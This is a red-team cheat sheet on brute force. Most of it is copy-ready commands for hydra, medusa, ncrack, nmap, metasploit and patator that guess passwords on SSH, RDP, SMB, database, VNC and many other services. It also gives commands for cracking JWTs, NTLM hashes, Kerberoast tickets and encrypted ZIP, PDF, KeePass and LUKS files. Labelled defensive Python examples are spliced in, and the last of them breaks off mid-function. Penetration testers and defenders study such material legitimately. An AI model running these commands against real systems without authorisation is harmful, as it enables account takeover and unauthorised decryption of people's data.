Red Team Cheat Sheet: Brute Force
2022-12-11 01:42:12 Author: Gcow安全团队

Default credentials

Search Google for the default credentials of the technology in use, or try these links:

  • https://github.com/ihebski/DefaultCreds-cheat-sheet

  • http://www.phenoelit.org/dpl/dpl.html

  • http://www.vulnerabilityassessment.co.uk/passwordsC.htm

  • https://192-168-1-1ip.mobi/default-router-passwords-list/

  • https://datarecovery.com/rd/default-passwords/

  • https://bizuns.com/default-passwords-list

  • https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv

  • https://github.com/Dormidera/WordList-Compendium

  • https://www.cirt.net/passwords

  • http://www.passwordsdatabase.com/

  • https://many-passwords.github.io/

Create your own dictionary

Find as much information about the target as possible and generate a custom dictionary. Tools that may help:

Crunch

    crunch 4 6 0123456789ABCDEF -o crunch1.txt   # length 4 to 6 over the given alphabet
    crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha   # length 4 only, using the mixalpha charset (defined in charset.lst)
    # Pattern placeholders for -t:
    # @ Lower case alpha characters
    # , Upper case alpha characters
    # % Numeric characters
    # ^ Special characters including space
    crunch 6 8 -t ,@@^^%%

Cewl

    cewl example.com -m 5 -w words.txt

CUPP

Generate passwords based on what you know about the victim (names, dates...)

    python3 cupp.py -h

pydictor

Wordlists

  • https://github.com/danielmiessler/SecLists

  • https://github.com/Dormidera/WordList-Compendium

  • https://github.com/kaonashi-passwords/Kaonashi

  • https://github.com/google/fuzzing/tree/master/dictionaries

  • https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

Services

Sorted alphabetically by service name.

AFP

    nmap -p 548 --script afp-brute <IP>
    msf> use auxiliary/scanner/afp/afp_login
    msf> set BLANK_PASSWORDS true
    msf> set USER_AS_PASS true
    msf> set PASS_FILE <PATH_PASSWDS>
    msf> set USER_FILE <PATH_USERS>
    msf> run

AJP

    nmap --script ajp-brute -p 8009 <IP>

Cassandra

    nmap --script cassandra-brute -p 9160 <IP>

CouchDB

    msf> use auxiliary/scanner/couchdb/couchdb_login
    hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Docker Registry

    hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

    hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

    hydra -l root -P passwords.txt [-t 32] <IP> ftp
    ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
    medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

HTTP Generic Brute

WFuzz

HTTP Basic Auth

    hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
    # for https use the https-get module
    medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10

HTTP - Post Form

    hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
    # for https use the https-post-form module

For https you have to change "http-post-form" to "https-post-form".

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

    cmsmap -f W/J/D/M -u a -p a https://wordpress.com

IMAP

    hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
    hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
    nmap -sV --script imap-brute -p <PORT> <IP>

IRC

    nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

    nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

    # hashcat
    hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
    # https://github.com/Sjord/jwtcrack
    python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
    # John
    john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
    # https://github.com/ticarpi/jwt_tool
    python3 jwt_tool.py -d wordlists.txt <JWT token>
    # https://github.com/brendan-rius/c-jwt-cracker
    ./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
    # https://github.com/mazen160/jwt-pwn
    python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
    # https://github.com/lmammino/jwt-cracker
    jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
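The defensive side of the JWT tools above, as an added example that is not part of the original cheat sheet: every one of them only succeeds when the HS256 secret is short or appears in a wordlist. The Python below (added here, standard library only, with a constructed token and secret rather than the tokens quoted above) signs and verifies HS256 tokens with the algorithm pinned and a constant-time signature comparison, and reports why a given secret would fall to a wordlist attack, using the 256-bit minimum that RFC 7518 section 3.2 sets for HS256 keys. The COMMON_SECRETS set is a constructed stand-in for a real wordlist.

```python
import base64
import hashlib
import hmac
import json
import secrets


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWS uses it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify_hs256(token: str, secret: bytes):
    """Return the payload if token is a valid HS256 token under secret, else None.
    The algorithm is pinned: a header claiming any other alg (including "none") is
    rejected before the signature is looked at, and the comparison is constant-time."""
    try:
        h, b, s = token.split(".")
        header = json.loads(b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{b}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    try:
        return json.loads(b64url_decode(b))
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed stand-in for a wordlist; a real check would test against the lists the page names.
COMMON_SECRETS = {b"secret", b"password", b"123456", b"changeme", b"jwt"}


def secret_weaknesses(secret: bytes) -> list:
    """Reasons the wordlist attacks above would succeed against this secret.
    RFC 7518 section 3.2 requires HS256 keys of at least 256 bits."""
    problems = []
    if len(secret) < 32:
        problems.append(f"only {len(secret) * 8} bits, RFC 7518 requires >= 256")
    if secret in COMMON_SECRETS:
        problems.append("appears in common wordlists")
    return problems


def new_secret() -> bytes:
    """A secret no wordlist or short mask will reach: 256 bits from the OS CSPRNG."""
    return secrets.token_bytes(32)


if __name__ == "__main__":
    weak = b"secret"
    token = sign_hs256({"username": "admin", "role": "admin"}, weak)
    print(token)
    print("valid:", verify_hs256(token, weak))
    print("weaknesses:", secret_weaknesses(weak))
    print("strong secret weaknesses:", secret_weaknesses(new_secret()))
```

Pinning the algorithm in the verifier is what makes the secret the only thing an attacker can go after; with a 32-byte random secret the wordlist and short-mask attacks listed above have nothing to find.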

LDAP

    nmap --script ldap-brute -p 389 <IP>

MQTT

    ncrack mqtt://127.0.0.1 --user test -P /root/Desktop/pass.txt -v

Mongo

    nmap -sV --script mongodb-brute -n -p 27017 <IP>
    use auxiliary/scanner/mongodb/mongodb_login

MySQL

    # hydra
    hydra -L usernames.txt -P pass.txt <IP> mysql
    # msfconsole
    msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
    # medusa
    medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

OracleSQL

    patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
    ./odat.py passwordguesser -s $SERVER -d $SID
    ./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
    # msf1
    msf> use admin/oracle/oracle_login
    msf> set RHOSTS <IP>
    msf> set RPORT 1521
    msf> set SID <SID>
    # msf2, this option uses nmap and it fails sometimes for some reason
    msf> use scanner/oracle/oracle_login
    msf> set RHOSTS <IP>
    msf> set RPORTS 1521
    msf> set SID <SID>
    # for some reason nmap fails sometimes when executing this script
    nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

To use oracle_login with patator you need to install:

    pip3 install cx_Oracle --upgrade

Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):

    nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

    hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
    hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

PostgreSQL

    hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
    medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
    ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
    patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
    use auxiliary/scanner/postgres/postgres_login
    nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

PPTP

You can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/

    sudo dpkg -i thc-pptp-bruter*.deb   # Install the package
    cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>

RDP

    ncrack -vv --user <User> -P pwds.txt rdp://<IP>
    hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

Redis

    msf> use auxiliary/scanner/redis/redis_login
    nmap --script redis-brute -p 6379 <IP>
    hydra -P /path/pass.txt redis://<IP>:<PORT>   # 6379 is the default port

Rexec

    hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

    hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

    hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

    nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

    hydra -l root -P passwords.txt <IP> rtsp

SNMP

    msf> use auxiliary/scanner/snmp/snmp_login
    nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
    onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
    hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

    nmap --script smb-brute -p 445 <IP>
    hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

SMTP

    hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
    hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V   # port 587 for SMTP with SSL

SOCKS

    nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>

SQL Server

    # Use the NetBIOS name of the machine as the domain
    crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
    hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
    medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
    nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>   # Use the domain if needed. Watch the number of passwords in the list: this can lock out accounts
    msf> use auxiliary/scanner/mssql/mssql_login   # Be careful, you can lock out accounts. If you have a domain, set it and use USE_WINDOWS_AUTHENT

SSH

    hydra -l root -P passwords.txt [-t 32] <IP> ssh
    ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
    medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
    patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
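What the hydra, ncrack, medusa and patator runs above look like from the target's side, as an added example that is not part of the original cheat sheet: the Python below parses a constructed OpenSSH auth.log excerpt (sample data using documentation address ranges, not lines from a real host) and flags any source that accumulates five failed passwords inside a sliding 60-second window. It also counts the distinct usernames each source tried, so that a spray across many accounts from one address is reported alongside a classic one-account brute force. The threshold and window are assumed values a defender would tune to the environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed OpenSSH auth.log excerpt for the demo (documentation address ranges, not real hosts).
SAMPLE_LOG = """\
Dec 11 01:42:10 bastion sshd[2311]: Failed password for root from 198.51.100.7 port 50122 ssh2
Dec 11 01:42:11 bastion sshd[2313]: Failed password for root from 198.51.100.7 port 50124 ssh2
Dec 11 01:42:12 bastion sshd[2315]: Failed password for invalid user admin from 198.51.100.7 port 50126 ssh2
Dec 11 01:42:13 bastion sshd[2317]: Failed password for invalid user oracle from 198.51.100.7 port 50128 ssh2
Dec 11 01:42:14 bastion sshd[2319]: Failed password for root from 198.51.100.7 port 50130 ssh2
Dec 11 01:42:15 bastion sshd[2321]: Failed password for root from 198.51.100.7 port 50132 ssh2
Dec 11 01:43:02 bastion sshd[2340]: Failed password for alice from 203.0.113.9 port 40001 ssh2
Dec 11 01:43:40 bastion sshd[2341]: Accepted publickey for alice from 203.0.113.9 port 40002 ssh2
"""

# sshd writes "invalid user" when the account does not exist; both forms count as a failure.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(text, year=2022):
    """Yield (timestamp, user, source_ip) for each failed-password line; other lines are ignored.
    Syslog timestamps carry no year, so one is assumed."""
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Return {source_ip: (failures_in_window, distinct_users_tried)} for every source that
    reaches `threshold` failed passwords inside a sliding window of `window_seconds`.
    Counting distinct users catches a spray (many accounts, few passwords) as well as a
    classic brute force (one account, many passwords)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)
    alerts = {}
    for ts, user, ip in parse_failures(text):
        window = recent[ip]
        window.append(ts)
        users[ip].add(user)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            alerts[ip] = (len(window), len(users[ip]))
    return alerts


if __name__ == "__main__":
    for ip, (count, nusers) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {count} failed logins, {nusers} distinct usernames")
```

On the sample the bastion sees six failures from one address in five seconds across three usernames, which trips the rule; the single failure followed by a key-based login from the other address does not. The same sliding-window logic applies to any of the services listed in this section once the failed-login line format for that service is swapped in.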

Telnet

    hydra -l root -P passwords.txt [-t 32] <IP> telnet
    ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
    medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

VNC

    hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
    medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
    ncrack -V --user root -P /root/Desktop/pass.txt <IP>:<PORT>
    patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
    nmap -sV --script vnc-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5900 <IP>
    # Metasploit
    use auxiliary/scanner/vnc/vnc_login
    set RHOSTS <ip>
    set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

    crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

Local

Online cracking databases

  • ~~http://hashtoolkit.com/reverse-hash?~~ (MD5 & SHA1)

  • https://www.onlinehashcrack.com/ (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)

  • https://crackstation.net/ (Hashes)

  • https://md5decrypt.net/ (MD5)

  • https://gpuhash.me/ (Hashes and file hashes)

  • https://hashes.org/search.php (Hashes)

  • https://www.cmd5.org/ (Hashes)

  • https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)

  • https://www.md5online.org/md5-decrypt.html (MD5)

  • http://reverse-hash-lookup.online-domain-tools.com/

Check these before trying to brute-force a hash.

ZIP

    # sudo apt-get install fcrackzip
    fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

    zip2john file.zip > zip.john
    john zip.john

    # $zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
    hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
    .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt   # Incremental attack

Known plaintext zip attack

You need to know the plaintext (or part of the plaintext) of a file contained inside the encrypted zip. You can check the filenames and sizes of the files contained in an encrypted zip by running: 7z l encrypted.zip. Download bkcrack from its releases page.

    # You need to create a zip containing only the file from the encrypted zip whose plaintext you know
    zip plaintext.zip plaintext.file
    ./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
    # Now wait; this will print a key such as 7b549874 ebc25ec5 7e465e18
    # With that key you can create a new zip file with the content of encrypted.zip
    # but with a different password that you set (so you can decrypt it)
    ./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
    unzip unlocked.zip   # use new_pwd as the password

7z

    cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

    # Download and install the requirements for 7z2john
    wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
    apt-get install libcompress-raw-lzma-perl
    ./7z2john.pl file.7z > 7zhash.john

PDF

    apt-get install pdfcrack
    pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
    # pdf2john doesn't work well; John doesn't recognise the hash type
    # Decrypt the pdf permanently
    sudo apt-get install qpdf
    qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

PDF Owner Password

To crack a PDF owner password check this: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

    git clone https://github.com/Sjord/jwtcrack.git
    cd jwtcrack
    # Brute force with crackjwt.py
    python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
    # Brute force with john
    python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
    john jwt.john   # This doesn't work with Kali's john

NTLM cracking

    # Format: USERNAME:ID:HASH_LM:HASH_NT:::
    john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
    hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

    sudo apt-get install -y kpcli   # install keepass tools such as keepass2john
    keepass2john file.kdbx > hash   # keepass uses only a password
    keepass2john -k <file-password> file.kdbx > hash   # keepass also uses a file as part of the required credentials
    # keepass can use a password and/or a file as credentials; if it uses both you need to give both to keepass2john
    john --wordlist=/usr/share/wordlists/rockyou.txt hash

Kerberoasting

    john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
    hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
    ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

LUKS image

Method 1

Install: https://github.com/glv2/bruteforce-luks

    bruteforce-luks -f ./list.txt ./backup.img
    cryptsetup luksOpen backup.img mylucksopen
    ls /dev/mapper/   # You should find the image mylucksopen here
    mount /dev/mapper/mylucksopen /mnt

Method 2

    cryptsetup luksDump backup.img   # check that the payload offset is set to 4096
    dd if=backup.img of=luckshash bs=512 count=4097   # payload offset + 1
    hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
    cryptsetup luksOpen backup.img mylucksopen
    ls /dev/mapper/   # You should find the image mylucksopen here
    mount /dev/mapper/mylucksopen /mnt

Another LUKS brute-force tutorial: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

Mysql

    # John hash format
    <USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
    dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

PGP/GPG Private key

    gpg2john private_pgp.key   # This will generate the hash and save it to a file
    john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

DPAPI Master Key

Use https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py or john.

Open Office Pwd Protected Column

If you have an xlsx file with a column protected by a password, you can unprotect it:

  • Upload it to Google Drive and the password will be removed automatically

  • To remove it manually:

    unzip file.xlsx
    grep -R "sheetProtection" ./*
    # Find something like: <sheetProtection algorithmName="SHA-512"
    hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
    # Remove that line and zip the file again
    zip -r file.xls .

PFX Certificates

    # From https://github.com/Ridter/p12tool
    ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
    # From https://github.com/crackpkcs12/crackpkcs12
    crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx

Tools

Hash examples: https://openwall.info/wiki/john/sample-hashes

Hash-identifier

    hash-identifier
    > <HASH>

Wordlists

  • Rockyou

  • Probable-Wordlists

  • Kaonashi

  • Seclists - Passwords

Wordlist Generation Tools

  • kwprocessor: Advanced keyboard-walk generator with configurable basechars, keymap and routes.

    kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

John mutation

Read /etc/john/john.conf and configure it

    john --wordlist=words.txt --rules --stdout > w_mutated.txt
    john --wordlist=words.txt --rules=all --stdout > w_mutated.txt   # Apply all rules

Hashcat

Hashcat attacks

  • Wordlist attack (-a 0) with rules

Hashcat already comes with a folder containing rules, but you can find other interesting rules here

    hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule

  • Wordlist combinator attack

With hashcat you can combine 2 wordlists into 1.

If list 1 contains the word "hello" and the second contains two lines with the words "world" and "earth", the words helloworld and helloearth will be generated.

    # This will combine 2 wordlists
    hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
    # Same attack as before but adding characters to the generated words
    # In the previous example this would generate:
    ## hello-world!
    ## hello-earth!
    hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
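To make the rule and combinator modes above concrete (and the John --rules mutation in the earlier section, which uses the same rule syntax), here is an added Python example that is not hashcat's or John's own code: it implements a small subset of the shared rule functions (:, l, u, c, r, $X, ^X), the -a 1 combinator with -j applied to the left word and -k to the right, and a policy check that reports whether a candidate password is merely a dictionary word under one of those rules. The word lists and rules in the block are constructed.

```python
def apply_rule(word: str, rule: str) -> str:
    """Apply a rule string in the syntax shared by hashcat and John's wordlist rules.
    Supported subset: ':' no-op, 'l' lowercase, 'u' uppercase, 'c' capitalise,
    'r' reverse, '$X' append X, '^X' prepend X. Functions run left to right;
    spaces between them are ignored; anything else raises rather than silently
    producing a wrong candidate."""
    i = 0
    while i < len(rule):
        f = rule[i]
        if f in ": ":
            pass
        elif f == "l":
            word = word.lower()
        elif f == "u":
            word = word.upper()
        elif f == "c":
            word = word[:1].upper() + word[1:].lower()
        elif f == "r":
            word = word[::-1]
        elif f in "$^":
            i += 1
            if i >= len(rule):
                raise ValueError(f"rule {rule!r}: {f} needs a character")
            word = word + rule[i] if f == "$" else rule[i] + word
        else:
            raise ValueError(f"unsupported rule function {f!r} in {rule!r}")
        i += 1
    return word


def mutate(words, rules):
    """Wordlist + rules (hashcat -a 0 -r, john --rules): every rule applied to every
    word, in wordlist order, which is the order the crackers emit candidates."""
    return [apply_rule(w, r) for w in words for r in rules]


def combine(left, right, left_rule=":", right_rule=":"):
    """Combinator attack (hashcat -a 1): each left word joined to each right word, after
    -j (left_rule) is applied to the left word and -k (right_rule) to the right word."""
    return [apply_rule(l, left_rule) + apply_rule(r, right_rule) for l in left for r in right]


def derivation(candidate, words, rules=(":",)):
    """Policy check: the (word, rule) pair that produces `candidate`, or None.
    A password that has a derivation is one these attacks would reach."""
    for w in words:
        for r in rules:
            if apply_rule(w, r) == candidate:
                return (w, r)
    return None


if __name__ == "__main__":
    # Constructed lists standing in for wordlist1.txt / wordlist2.txt above.
    print(combine(["hello"], ["world", "earth"], "$-", "$!"))   # ['hello-world!', 'hello-earth!']
    print(mutate(["hello"], [":", "c", "c$1", "r"]))
    print(derivation("Summer2022!", ["summer", "winter"], ["c$2$0$2$2$!"]))
```

The derivation check is the useful part on the defending side: a password policy that only demands "one capital, digits and a symbol" is satisfied by Summer2022!, which a single short rule turns a dictionary word into, so a policy check that runs the same rules the crackers run rejects it before it is set.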

  • Mask attack (-a 3)

    # Mask attack with a simple mask
    hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
    hashcat --help   # will show the charsets, like this:
    ? | Charset
    ===+=========
    l | abcdefghijklmnopqrstuvwxyz
    u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
    d | 0123456789
    h | 0123456789abcdef
    H | 0123456789ABCDEF
    s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
    a | ?l?u?d?s
    b | 0x00 - 0xff
    # Mask attack declaring a custom charset
    hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
    ## -1 ?d?s defines a custom charset (digits and special chars)
    ## ?u?l?l?l?l?l?l?l?1 where ?1 is the custom charset
    # Mask attack with variable password length
    ## Create a file called masks.hcmask with the following content:
    ?d?s,?u?l?l?l?l?1
    ?d?s,?u?l?l?l?l?l?1
    ?d?s,?u?l?l?l?l?l?l?1
    ?d?s,?u?l?l?l?l?l?l?l?1
    ?d?s,?u?l?l?l?l?l?l?l?l?1
    ## Use it to crack the password
    hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
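How large these mask keyspaces actually are, as an added Python example that is not from the original page or from hashcat: it parses .hcmask lines in the syntax shown above (comma-separated custom charsets followed by the mask; ?? is a literal question mark; escaped commas are not handled), expands the built-in charsets as hashcat --help lists them, and returns the number of candidates plus the time to exhaust them at a given hash rate. The rate in main is an assumed round figure for illustration, not a benchmark.

```python
import math

# Built-in charsets as printed by `hashcat --help`; ?s has 33 characters including the leading space.
BUILTIN = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "b": "".join(chr(i) for i in range(256)),
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def expand(spec, custom):
    """Set of characters denoted by a charset spec such as '?d?s' or 'abc?1'.
    '??' is a literal question mark; any other character stands for itself."""
    chars = set()
    i = 0
    while i < len(spec):
        if spec[i] != "?":
            chars.add(spec[i])
            i += 1
            continue
        if i + 1 >= len(spec):
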